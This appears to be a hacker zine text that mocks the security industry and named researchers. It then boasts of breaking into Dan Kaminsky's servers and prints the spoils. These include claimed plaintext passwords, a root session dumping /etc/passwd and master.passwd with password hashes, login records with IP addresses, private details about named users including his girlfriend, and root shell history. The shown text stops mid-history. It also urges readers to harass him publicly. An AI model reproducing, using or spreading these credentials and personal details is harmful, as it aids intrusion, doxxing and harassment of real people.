index.php -rwx------ 1 ronald ronald 6204 2009-01-23 17:21 index_pig.php drwx------ 2 ronald ronald 8192 2009-01-23 17:21 js -rwx------ 1 ronald ronald 5333 2009-01-23 17:21 linkdumpssdsw.php -rwx------ 1 ronald ronald 570 2009-01-23 17:21 log.html -rwx------ 1 ronald ronald 4631 2009-01-23 17:22 logo.gif -rwx------ 1 ronald ronald 3449 2009-01-23 17:22 logo_over.gif -rwx------ 1 ronald ronald 7612 2009-01-23 17:21 logo.png -rwx------ 1 ronald ronald 1712 2009-01-23 17:21 no.gif -rwx------ 1 ronald ronald 77020 2009-01-23 17:21 NYF.jpg drwx------ 3 ronald ronald 8192 2009-01-23 17:21 od -rwx------ 1 ronald ronald 1189 2009-01-23 17:21 phpPOP3bruteforcer.phps -rwx------ 1 ronald ronald 1223 2009-01-23 17:21 phpTORwrapper.phps drwx------ 2 ronald ronald 8192 2009-01-23 17:21 plesk-stat -rwx------ 1 ronald ronald 8641 2009-01-23 17:21 plopper.gif -rwx------ 1 ronald ronald 9298 2009-01-23 17:21 plopper.rar -rwx------ 1 ronald ronald 4326 2009-01-23 17:21 registersddsw.php -rwx------ 1 ronald ronald 2192 2009-01-23 17:21 remoteSQLhashExtracter.phps -rwx------ 1 ronald ronald 0 2009-01-23 17:22 robots.txt -rwx------ 1 ronald ronald 774 2009-01-23 17:21 rss.php -rwx------ 1 ronald ronald 12994 2009-01-23 17:21 secure_coding_map.png drwx------ 2 ronald ronald 8192 2009-01-23 17:21 smiles -rwx------ 1 ronald ronald 6767 2009-01-23 17:22 sn00per.phps -rwx------ 1 ronald ronald 204 2009-01-23 17:21 sop2.html -rwx------ 1 ronald ronald 1036 2009-01-23 17:21 sop.html -rwx------ 1 ronald ronald 2001 2009-01-23 17:22 stats.php -rwx------ 1 ronald ronald 989 2009-01-23 17:21 style.css -rwx------ 1 ronald ronald 74209 2009-01-23 17:22 suigenchi.rar -rwx------ 1 ronald ronald 14709 2009-01-23 17:21 thw.gif -rwx------ 1 ronald ronald 2035 2009-01-23 17:22 tools.php -rwx------ 1 ronald ronald 39048 2009-01-23 17:22 TorSniff.phps drwx------ 3 ronald ronald 8192 2009-01-23 17:22 webappsec drwx------ 2 ronald ronald 8192 2009-07-15 12:27 x Again, we could drop the database and users but there is no need, this is old material but fun material :) Ronald said he'd had enough of security a while back, he had many wannabes who worshipped him. He probably got to the stage at which he realised that what he did does not require much intelligence. When you realise that and you have people worshipping you - you get to wondering how dumb some of these people are, and hence the security industry is. Ronald got to that point despite lacking much security talent himself (see above) and focusing on just web security. Credit to you for sticking to your guns and walking away Ronald, one thing is for sure, there is more class in your slightly stretched (im sure) dutch asshole than there is in Jeremiah Grossman and rsnake's brains. | \ / _\/_ Industry check .-'-. //o\ _\/_ -- / \ -- | /o\\ ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~` We don't talk to police | We don't make a peace bond The security scene is fucked. You have Dan Kaminsky lecturing you on how DNS poisoning will destroy life as we know it. You have Matasano harvesting talent and critiquing everyone, and then Ptacek can only announce the release of....a graphical firewall management client. There's kingcope killing bugs and dropping weaponized exploits while making no other contribution except putting a smile on the face of kiddies. There's iDefense and their competitors selling exploits and only doing research in how to make more exploits. There's Jeff Moss running a conference under the hideous misnomer "Blackhat Briefings" where the same researchers search for glory and present the same shit year after year. There are people who just live press release by press release. And on top of it all, somehow you STILL have not got rid of Kevin Mitnick. The industry cares about virtualization one year and iPhones the next, every year forgetting the lessons it should have picked up in the last. If you are just someone looking to pay a fair price to not get owned, you find out quickly that none of these people exist to help you. Very few people in this industry have their income model based around actually making you more secure. At best, some of them have it based around convincing you that you are better off. The very concept of "penetration testing" is fundamentally flawed. The problem with it is that the penetration tester has a limited set of targets they're allowed to attack, while a real attacker can attack anything in order to gain access to the site/box. So if a site on a shared host is being tested, just because site1.com is "secure" that does NOT in anyway mean that the server is secure, because site2.com could easily be vulnerable to all sorts of simple attacks. The time constraint is another problem. A professional pentester with a week or two to spend on a client's network may or may not get into everything. A real dedicated hacker making the slog who spends a month of eight hour days WILL get into anything they target. You're lucky if it even takes him that long, really. Those things should all be very obvious, but whitehats still make the mistake of discounting them. Look at Mitnick. Every time he gets owned he blames his host or his DNS provider. If he's getting owned through them, that's still his fault. Choosing a host is a security decision, it's just like choosing a password. If you choose a weak one you expose yourself. It's still your fault. It's the same with outsourcing the development of your security-critical code. Mitnick could get someone else to make him a flashy website, and then blame them when it is full of file include vulnerabilities. People do this all the time, indirectly, by using ridiculous CMS or blog software. As an easy example, look at Wordpress. Even easier, look at Wordpress in 2007. Horrid. When considering Wordpress, a blackhat starts reading the PHP, shudders and giggles, and then laughs at the idea of ever using it on one of their servers. A whitehat never gets that far apparently, they just install it and get owned. I simply fail to see how leading security researchers run all kinds of code that is blatantly dangerous. Are they really that bad at reading code? Or do they just not care much if their passwords end up on Full Disclosure? If it's the second option, why is that? Why can these people make a living selling security when they make such bad choices? How do they maintain legitimacy? They take less responsibility for getting owned than do the people who they sell services to. There's a popular term for people who don't read code. We call them script kiddies. You cannot outsource blame. You HAVE to take responsibility for your mistakes, whether they are mistakes in your code, mistakes in code you are using, mistakes by your host, or mistakes in who you trust. These are all security choices. Learn to control this shit. Learn how to read code. A lot of the time it only takes a very shallow audit to realise that the code is crap and is bound to have bugs. In a smarter world, security professionals get paid to stop people from getting owned. End of. These is no limit to the scope of an audit. Are you professional types really this out of touch? I see all these papers about how to protect yourself from these super-fucking-advanced techniques and exploits that very few people can actually develop, and most hackers will NEVER USE. It's the simple stuff that works now, and will continue to work years into the future. Not only is it way easier to dev for simple mistakes, but they are easier to find and are more plentiful. The whole concept of full-disclosure has backfired. It will never work. It's some slashdot hippie pipe dream. Even you dumbass corporate types should recognize this. If you're constantly giving away all the vulnerabilites you find, for *FREE* mind you (and what other industry does that?), and the vulnerabilites get harder and harder to find and exploit, it will get harder and harder for you all to do your "job". Frankly, I'm surprised that the non-disclosure movement didn't start in the security industry in the first place. In a way it did, by default. With full-disclosure, the security industry is all about show and gloat, it is not about fixing anything. A lot of bugs have been fixed from it, but it comes with the price of an industry that likes to cripple itself. Projects run by teams of trained monkeys are always eager to add more bugs to replace those that have been fixed. We hate the industry because it is full of shit. There are so many trolls like Kaminsky who just desperately search for anything new, to get attention. So many talentless buffoons trying to scam the planet. A lot of the actual talent out there is severely misapplied. It's an industry tied to news and not results, because very few of you can even attain results. When you can't, who's the wiser? Your customers can hardly tell if you have really made them more secure or not. Sometimes there are superficial benefits, sometimes there aren't. How do you convince the customer that they are more ZF0-safe than before, if they were never targetted and probably never will be? And you all lack the legitimacy to really do the job you should anyways. We can only expose so many frauds, the rest of you can pretend you have changed something. Very few whitehats actually go out there and provide a service where they make people more secure. Not just for a day or a month. Are you genuinely fixing the underlying design and logic flaws that generate security problems for your clients or customers? If you actually clean up every exposed security flaw they have, will they still be "secure" in six months or a year? We could go on. Just in general, the industry is failing. Flat out failing. You cannot even protect yourselves. | \ / _\/_ Dan Kaminsky .-'-. //o\ _\/_ -- / \ -- | /o\\ ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~` Just as every cop is a criminal | And all the sinners saints As heads is tails Just call me Lucifer 'cause I'm in need of some restraint So if you meet me Have some courtesy Have some sympathy, and some taste Use all your well-learned politesse Or I'll lay your soul to waste !~~~~~~~~~~~~~~~~~~ Dan Kaminsky 0wned to Fuck ~~~~~~~~~~~~~~~~~~! !~~~~~~~~~~ Table of Contents ~~~~~~~~~~! 1. mail.doxpara.com 2. backend.doxpara.com 3. attacker.doxpara.com 4. www.doxpara.com 5. Select spools 2005-2009 6. Select gmail 7. Select twitter Dan Kaminsky is a noob. This guy does not know the first thing about security. His boxes were a crazy combination of half-updated shit, half- removed shit, half-installed shit, half-configured shit. The lack of things working properly actually blocked a bit of 0day. But Dan, do not go selling that as some kind of advanced defense - you provided us with plenty of local holes to exploit and root. Dan is a selfish jerkoff who is hated by the security industry and the underground alike. He's fat and ugly in a way that only Gadi Evron could love. Is that hairy ass picture yours or ccg's? Do we want to know? When Dan made a huge stink about DNS flaws about a year ago (July 2008) we knew we had to own him sooner or later. So we did. Him and his little whitehat bitch friends too. Dan cannot even administer a box, let alone preach security. He lacks all real legitimacy because he only hunts for flashy bugs that he can turn into a big story. This guy would be the least important character in any real security organization, the fatass past his prime (did Dan have a prime?) who obsesses over areas that no-one else wants to touch just so he can find a niche and avoid getting let go. spender puts this nicely: < dan_kam> LS -AL 0DAYZ/ < dan_kam> LS -AL 0DAYZ/ < spender> dns1.c < spender> dns2.c < spender> dns3.c < spender> dns4.c < spender> dns5.c < spender> dns6.c < spender> dns7.c < dan_kam> grsux.c < spender> dns8.c < spender> dns9.c < dan_kam> stab_spender.c We hacked Dan's assets first through finding bugs and writing 0day, and then through abusing him giving away passwords and his silly password scheme. Check out just some of his passes: fuck.hackers, 0hn0z (root account on his mail box), fuck.omg, fuck.vps, ohhai Five character root password? Niiiiiiice. From .mysql_history: SET PASSWORD FOR 'root'@'localhost' = PASSWORD('fuck.mysql'); See the pattern? Adding fuel to the fire (and hopefully flames to his talks!), Dan has a messy personal life involving him, his girlfriend, and other girls who he would love to get with. For once, we are mostly sparing the girlfriend. Who says chivalry is dead? But we'll still point out the dating torrents that Kaminsky downloads. Will people please troll Dan at BHB and Defcon? Basically anybody with the loosest affiliation to ZF0 doesn't want to do it for obvious reasons. So we need everyone else to. Ask questions. Ask him how he feels about being a security researcher while hackers can read his most private messages. While we can keep up on any "work" he is doing. While we can monitor whitehat communications through individual emails and mailing lists that he is a part of. How we've read every emo conversation between him and ccg. Ask him what the fuck he is doing standing before you as a lecturer. Remember, anyone *not* trolling Dan must be ZF0. You don't want to be accused of such a thing, do you? So put your hands up! The hax logs of Dan's bounces run about 8000 lines, so that's the number to skip if you don't want to read them. !~~~~~~~~~~ mail.doxpara.com ~~~~~~~~~~! Password: Last login: Mon Jun 29 10:00:45 2009 from cpe-72-225-172- FreeBSD 7.0-STABLE (GENERIC) #0: Mon Jul 28 18:18:06 PDT 2008 ******************************************************************************** ******************************************************************************** OS Update to BSD 7.0 is complete. Email is up, procmail is up. Apache and MySQL are up and all websites seem to operating normally. Still patching a few more apps but things are good to go.... ******************************************************************************** ******************************************************************************** Any questions, let me know (pmauvais at gmail.com). %uname -a; id FreeBSD livingend.org 7.0-STABLE FreeBSD 7.0-STABLE #0: Mon Jul 28 18:18:06 PDT 2008 psm at pmjm.com:/usr/obj/usr/src/sys/GENERIC i386 uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) %cat /etc/passwd /etc/master.passwd # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin admin:*:1001:0:User &:/home/admin:/bin/sh ice:*:1000:1000:Eric Hampshire:/home/ice:/usr/local/bin/bash effugas:*:3000:1007:Dan Kaminsky:/home/effugas:/usr/local/bin/bash effugas_nr:*:0:1009:effugas_nr:/home/effugas_nr:/usr/local/bin/bash psm:*:1002:1002:Paul S. Mauvais:/home/psm:/bin/tcsh jmondala:*:1004:1004:Jayson Mondala:/home/jmondala:/bin/tcsh mysql:*:88:88:MySQL Daemon:/var/db/mysql:/sbin/nologin gir:*:1005:1005:ssj:/home/gir:/sbin/nologin mooseaccess:*:1007:1005:roomwithamoose.com staff access account: /home/mooseaccess:/usr/local/bin/bash jb:*:0:0:Jay "Ask DanK" Beale:/home/jb:/sbin/nologin jay:*:1008:1008:Jay Non-priv user:/home/jay:/sbin/nologin squid:*:100:100:squid caching-proxy pseudo user:/usr/local/squid:/sbin/nologin cyrus:*:60:60:the cyrus mail server:/nonexistent:/sbin/nologin karin:*:1010:1010:Karin Olefsky:/home/karin:/sbin/nologin hampshir:*:1011:1011:Linda Hampshire:/home/hampshir:/sbin/nologin andyw:*:1012:1012:Andy Washburn:/home/andyw:/sbin/nologin ginray:*:1013:1013:Ray Hampshire:/home/ginray:/sbin/nologin jcrossley:*:1014:1014:Josh Crossley:/home/jcrossley:/sbin/nologin dire:*:1015:1015:Dire:/home/dire:/usr/local/bin/bash tom:*:1017:1017:Tom:/home/tom:/sbin/nologin dante:*:1018:1018:Dante Fontana:/home/dante:/sbin/nologin tomstdenis:*:1019:1019:Tom St. Denis:/home/tomstdenis:/sbin/nologin pig:*:1020:1020:Piggy:/home/pig:/sbin/nologin spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin bmondala:*:1021:1021:Byron Mondala:/home/bmondala:/usr/local/bin/bash jeff:*:3001:3001:Jeff (andy's roommate):/home/jeff:/sbin/nologin jaymi:*:3002:3002:Jaymi:/home/jaymi:/usr/local/bin/bash dmktest:*:3003:3003:QUick IMAP testing acct:/home/dmktest:/bin/sh clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin courier:*:465:465:Courier Mail System:/var/spool/courier:/sbin/nologin dovecot:*:3005:3005:Dovecot:/nonexistent:/sbin/nologin bre:*:3007:3007:Bre Pettis (friend of DanK):/home/bre:/usr/local/bin/bash messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin jenicole:*:3009:3009:Jenifer Hendersen:/home/jenicole:/usr/local/bin/bash ventrilo:*:3010:3010:Vent Server:/home/ventrilo:/usr/local/bin/bash teamspeak:*:3011:3011:Teamspeak Server:/usr/local/lib/teamspeak_server:/bin/sh crystal:*:3012:3012:Crystal Williams (GF of DanK):/home/crystal:/bin/sh dakami:*:3013:3013:Dan Kaminsky:/home/dakami:/bin/sh d:*:3014:3014:Dan Kaminsky:/home/d:/bin/sh # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:$1$i/Ie/wCS$.KOSeZEDN6CA3yMkZneps1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin admin:$1$Up9Pvs8P$PbxBZLtazl6ALXEB/4Rjl0:1001:0::0:0:User &:/home/admin:/bin/sh ice:$1$PD3B0JSg$lZdr6qbdsyw/l8nCfGemd0:1000:1000::0:0:Eric Hampshire:/home/ice:/usr/local/bin/bash effugas:$1$oZvjMVSM$Jty9wZ8MrctQi7ng/0DW0/:3000:1007::0:0:Dan Kaminsky:/home/effugas:/usr/local/bin/bash effugas_nr:$1$cpg5LHyh$ux6kFuzVbz9va5tVyr6zd1:0:1009::0:0:effugas_nr:/home/effugas_nr:/usr/local/bin/bash psm:oEebFXfhgTUEU:1002:1002::0:0:Paul S. Mauvais:/home/psm:/bin/tcsh jmondala:$1$oQCOHp1q$aysrD4rV2Qrm7lWFNXQGa1:1004:1004::0:0:Jayson Mondala:/home/jmondala:/bin/tcsh mysql:*:88:88::0:0:MySQL Daemon:/var/db/mysql:/sbin/nologin gir:$1$Lo2YVL9E$kP2JMg5t4LiLm.LZKxH4e/:1005:1005::0:0:ssj:/home/gir:/sbin/nologin mooseaccess:$1$YPhnYQUw$H9iKhq26emThSps7P7BR1.:1007:1005::0:0:roomwithamoose.com staff access account:/home/mooseaccess:/usr/local/bin/bash jb:$1$euM6Ur7n$sOwNVjRzwpTlkAKlB9rmg.:0:0::0:0:Jay "Ask DanK" Beale:/home/jb:/sbin/nologin jay:$1$o/rJ4n66$Er4Kwz.vLylWyNEfv3UkI.:1008:1008::0:0:Jay Non-priv user:/home/jay:/sbin/nologin squid:*:100:100::0:0:squid caching-proxy pseudo user:/usr/local/squid:/sbin/nologin cyrus:*:60:60::1126162800:0:the cyrus mail server:/nonexistent:/sbin/nologin karin:$1$sJNV5vfc$J4kqjoz6rWyAFMgRVhECJ1:1010:1010::0:0:Karin Olefsky:/home/karin:/sbin/nologin hampshir:$1$v.VtMVw2$y9O801Dd1xRZElRdwjGNu/:1011:1011::0:0:Linda Hampshire:/home/hampshir:/sbin/nologin andyw:$1$AHYmVj/z$WXl4jphDfetCvnxhgXPEl/:1012:1012::0:0:Andy Washburn:/home/andyw:/sbin/nologin ginray:$1$kxnbMdrw$PYqmfzO2hKLCuxGCoC/r6/:1013:1013::0:0:Ray Hampshire:/home/ginray:/sbin/nologin jcrossley:$1$8eqfPvQ5$eFJb/ahpcDwWxM2qx8Q98.:1014:1014::0:0:Josh Crossley:/home/jcrossley:/sbin/nologin dire:oZhmaPbAXAn6A:1015:1015::0:0:Dire:/home/dire:/usr/local/bin/bash tom:$1$ZLuPUB8/$3TT37qMyOkMHsgiY4unSX0:1017:1017::0:0:Tom:/home/tom:/sbin/nologin dante:$1$Q7jW/HjA$HFqQtTYlGbei8PXk.VdYq.:1018:1018::0:0:Dante Fontana:/home/dante:/sbin/nologin tomstdenis:$1$cTlcgI43$88XYWP8iWCGOeA4GVLKmQ0:1019:1019::0:0:Tom St. Denis:/home/tomstdenis:/sbin/nologin pig:$1$xvJADnU6$Vs1QxYM6.Y4A1Iwac.6bN.:1020:1020::0:0:Piggy:/home/pig:/sbin/nologin spamd:*:58:58::0:0:SpamAssassin user:/var/spool/spamd:/sbin/nologin bmondala:$1$iQVmQMD9$0cFAyR0lb20e4sKGCmGdI/:1021:1021::0:0:Byron Mondala:/home/bmondala:/usr/local/bin/bash jeff:$1$8L.vlF4X$Tbx/beOvwQ0NekpNk/taG1:3001:3001::0:0:Jeff (andy's roommate):/home/jeff:/sbin/nologin jaymi:$1$UUvdCblj$BPQTleL9/8wabAlbhPZSa1:3002:3002::0:0:Jaymi:/home/jaymi:/usr/local/bin/bash dmktest:$1$cuiENSK6$mbM/rhy2GLgurExfekIZY1:3003:3003::0:0:QUick IMAP testing acct:/home/dmktest:/bin/sh clamav:*:106:106::0:0:Clam Antivirus:/nonexistent:/sbin/nologin courier:*:465:465::0:0:Courier Mail System:/var/spool/courier:/sbin/nologin dovecot:*:3005:3005::0:0:Dovecot:/nonexistent:/sbin/nologin bre:$1$UME.X.Kz$iV61uueELXhDl/yRmszNM1:3007:3007::0:0:Bre Pettis (friend of DanK):/home/bre:/usr/local/bin/bash messagebus:*:556:556::0:0:D-BUS Daemon User:/nonexistent:/sbin/nologin jenicole:$1$MUi4DG.2$WhZSeodaU236IUTRVi8/X.:3009:3009::0:0:Jenifer Hendersen:/home/jenicole:/usr/local/bin/bash ventrilo:$1$xuRLxmKF$rFFr1KAraOSjQXdmnSDU31:3010:3010::0:0:Vent Server:/home/ventrilo:/usr/local/bin/bash teamspeak:*:3011:3011::0:0:Teamspeak Server:/usr/local/lib/teamspeak_server:/bin/sh crystal:$1$yzGs4j41$G8O47AhlS1X.ddcHK/zKi0:3012:3012::0:0:Crystal Williams (GF of DanK):/home/crystal:/bin/sh dakami:$1$muEpUjpN$u8sKOctH93SLnRgltDXMA/:3013:3013::0:0:Dan Kaminsky:/home/dakami:/bin/sh d:$1$nPgifnIS$1gWRCmi3UVXuDNb3QDMRh1:3014:3014::0:0:Dan Kaminsky:/home/d:/bin/sh %w 8:35AM up 75 days, 11:44, 1 user, load averages: 0.05, 0.09, 0.08 USER TTY FROM LOGIN@ IDLE WHAT crystal p0 76.14.85.220 6:47AM 1:48 sleep 60 %last -n 20 crystal ttyp0 76.14.85.220 Mon Jul 20 06:47 still logged in crystal ttyp0 76.14.85.220 Sun Jul 19 17:55 - 19:42 (01:46) jmondala ttyp0 m208-54.dsl.rawb Sun Jul 19 10:16 - 17:19 (07:03) effugas ttyp0 125-225-67-230.d Fri Jul 17 11:37 - 06:18 (18:40) crystal ttyp0 70-7-125-81.pool Fri Jul 17 08:15 - 11:19 (03:04) jmondala ttyp0 128-107-239-233. Thu Jul 16 22:44 - 07:27 (08:42) jmondala ttyp5 128-107-239-233. Thu Jul 16 11:29 - 13:43 (02:14) jmondala ttyp4 m208-54.dsl.rawb Thu Jul 16 11:27 - 13:44 (02:16) crystal ttyp0 76.14.85.220 Thu Jul 16 07:59 - 13:06 (05:06) jmondala ttyp4 dhcp-171-70-239- Wed Jul 15 17:58 - 21:22 (03:24) crystal ttyp0 76.14.85.220 Wed Jul 15 08:01 - 19:34 (11:33) crystal ttyp0 76.14.85.220 Tue Jul 14 22:28 - 01:50 (03:21) crystal ttyp0 72-62-116-68.poo Tue Jul 14 14:51 - 17:58 (03:06) effugas ttyp0 125-225-68-165.d Tue Jul 14 07:57 - 10:12 (02:14) crystal ttyp0 76.14.85.220 Tue Jul 14 06:03 - 07:13 (01:09) crystal ttyp0 68-27-9-22.pools Mon Jul 13 18:33 - 23:30 (04:57) psm ttyp4 128-107-239-233. Mon Jul 13 13:35 - 15:34 (01:58) crystal ttyp0 70-1-246-110.poo Mon Jul 13 12:43 - 17:00 (04:17) effugas ttyp0 125-225-68-165.d Mon Jul 13 11:47 - 11:54 (00:07) effugas ttyp7 125-225-68-165.d Mon Jul 13 10:52 - 12:48 (01:55) %cd /root %ls -la total 1016 drwxr-xr-x 7 root wheel 1024 May 10 07:08 . drwxr-xr-x 22 root wheel 1024 May 5 20:47 .. -rw------- 1 root wheel 108 Sep 28 2006 .Xauthority -rw------- 1 root wheel 8791 Jun 29 06:47 .bash_history -rw-r--r-- 1 root wheel 789 Oct 3 2006 .bashrc drwxr-xr-x 5 root wheel 512 Sep 4 2007 .bittorrent -rw-r--r-- 2 root wheel 786 Jul 22 2008 .cshrc -rw------- 1 root wheel 2217 Jul 13 15:34 .history -rw-r--r-- 1 root wheel 143 Nov 3 2005 .k5login -rw------- 1 root wheel 174 Feb 17 16:02 .lesshst -rw-r--r-- 1 root wheel 293 Nov 3 2005 .login -rw------- 1 root wheel 1396 Sep 5 2008 .lsof_pmjm -rw------- 1 root wheel 5872 May 10 07:08 .mysql_history -rw-r--r-- 2 root wheel 253 Jul 22 2008 .profile -rw------- 1 root wheel 1024 Feb 17 16:05 .rnd drwx------ 2 root wheel 512 Nov 6 2008 .ssh -rw-r--r-- 1 root wheel 36086 Jul 24 2008 logo-thelivingend.gif drwx------ 2 root wheel 512 Oct 9 2006 mail -rw-r--r-- 1 root wheel 80 Jul 24 2008 modules.txt -rw-r--r-- 1 root wheel 25008 Jul 22 2008 pkgs -rw-r--r-- 1 root wheel 10380 Jul 22 2008 portmaster-list -rw-r--r-- 1 root wheel 45 Jul 22 2008 ports-byhand -rw-r--r-- 1 root wheel 811 Sep 14 2007 queue-by-email.pl -rw-r--r-- 1 root wheel 811 Sep 14 2007 queue-by-from.pl -rw-r--r-- 1 root wheel 815 Sep 14 2007 queue.pl -rw-r--r-- 1 root wheel 1565 Sep 14 2007 remove-queue-by-email.pl drwxr-xr-x 2 root wheel 512 Jul 9 2008 ventrilo_srv -rw-r--r-- 1 root wheel 148042 Nov 14 2008 ventrilo_srv-3.0.2-FreeBSD-i386.tar.gz -rw-r--r-- 1 root wheel 208458 May 29 2008 ventrilo_srv-3.0.2-Linux-i386.tar.gz drwxr-xr-x 2 500 500 512 Nov 19 2007 ventsrv %cat .bash_history grep rl /etc/dev* vi /etc/devd.conf cd /etc grep lnc * grep le * grep le0 * grep rl * grep rl *|more man dev df man devfs vi /etc/devfs.rules vi /etc/defaults/devfs.rules jobs fgt fg ifconfig rl0 ifconfig lnc0 grep lnc * grep lnc */* grep lnc */*/* grep lnc */*/*/* grep lnc */*/*/*/* sync shutdown -r now PATH=/bin:/usr/bin:/sbin:/usr/sbin; umask 022; unset TMOUT set cd /usr/src make cleandir cd /usr/adm make update pwd pushd /sys/i386/conf/ ls vi GENERIC ls unalias vi vi GENERIC grep COMPAT43 * ls fg grep lnc * ifconfig -a grep rl * ls vi GENERIC pwd popd mergemaster -p cd /usr/adm && cd /usr/adm && make world-build kernel-build pwd /etc/rc.d/sendmail stop ps -awux /usr/local/etc/rc.d/sa-spamd stop ps -auwx ps -auwx|more ps -auwx|grep send make world-install kernel-install ls /etc/rc.d/ike rm -f /etc/rc.d/ike /etc/rc.d/pccard /etc/rc.d/pcvt /etc/rc.d/ramdisk rm -f /etc/rc.d/ramdisk-own /etc/rc.d/usbd pwd make etc make clean w sync vi /etc/rc.conf ls /dev/net/rl0 ls -l /dev/net/rl0 ls /dev ls /etc ls /etc/d* grep rl /etc/dev* vi /etc/devd.conf cd /etc grep lnc * grep le * grep le0 * grep rl * grep rl *|more man dev df man devfs vi /etc/devfs.rules vi /etc/defaults/devfs.rules jobs fgt fg ifconfig rl0 ifconfig lnc0 grep lnc * grep lnc */* grep lnc */*/* grep lnc */*/*/* grep lnc */*/*/*/* sync shutdown -r now PATH=/bin:/usr/bin:/sbin:/usr/sbin; umask 022; unset TMOUT ( for dir in /bin /sbin /usr/bin /usr/sbin /usr/libexec /usr/libdata; do find $dir -mtime +2 -type f -xdev -print; find $dir -mtime +2 -type l -xdev -print; done ) >/tmp/remove vi /tmp/remove unalias vi vi /tmp/remove which perl whereis perl ls -l /usr/bin/perl ls -l /usr/local/bin/perl5.8.8 mv /tmp/remove ~psm/remove-old1 ( for dir in /lib /usr/lib; do find $dir -mtime +2 -type f -xdev -print; find $dir -mtime +2 -type l -xdev -print; done ) | grep -v /usr/lib/compat >/tmp/move vi /tmp/move for x in `cat /tmp/move`; do chflags noschg $x; mv $x /usr/lib/compat/; done cd /usr/src; make BATCH_DELETE_OLD_FILES=YES delete-old delete-old-libs w w shutdown -r now ls cd /home/ventrilo/ ls grep vent ~/.bash_history vi ventrilo_srv.htm unalias vi vi ventrilo_srv.htm ls ./ventrilo_srv -h mv /root/ventsrv_bsd . ls cd ventsrv_bsd/ ls cp ../ventrilo_srv.ini . ./ventrilo_srv cd /home/ventrilo/ ls ./ventrilo_srv & grep ssj /etc/passwd vipw vipw vipw passwd mouseaccess passwd mooseaccess cd /export/www/yourmom.sh vi nerd.php3 vi nerd.php3 df -h cd /var/log/ ls ls -l ls rm httpd-access.log.122* du -hs df -h cd - vi nerd.php3 df -h apachectl startssl apachectl start vipw passwd mooseaccess passwd mooseaccess cd /home/ ls vipw mkdir mooseaccess chown mooseaccess mooseaccess/ cd mooseaccess/ ln -s /export/www/roomwithamoose.com . ls ls -l cd ventrilo_srv ls cd /home/ventrilo/ ls ./ventrilo_srv -h wget http://www.ventrilo.com/dlprod.php?id=102 cd /root/ ls cd ventrilo_srv ls cd .. tar zxvf ventrilo_srv-3.0.2-FreeBSD-i386.tar.gz cd ventsrv/ ls ./ventrilo_srv top df -h cd /var/log/ ls du -hs ls -l rm httpd-access.log.1226016000 df -h df -h top cd /export/www/roomwithamoose.com/vbulletin ls du -hs rm forumbackup-01-* rm forumbackup-0* df -h df -h ls ls ../vbulletin_archive/ cd .. ls cd backup ls cd ../backups/ ls rm * cd ../vbulletin ls mv forumbackup-1* ../backups/ df -h top cd /export/www/roomwithamoose.com/ ls rm -rf vbulletin.bak/ cp -Rp vbulletin vbulletin.bak rm -rf vbulletin.bak/ cp -Rp vbulletin vbulletin.bak cd vbulletin ls cd install/ ls mv install.php install.php.bak cd 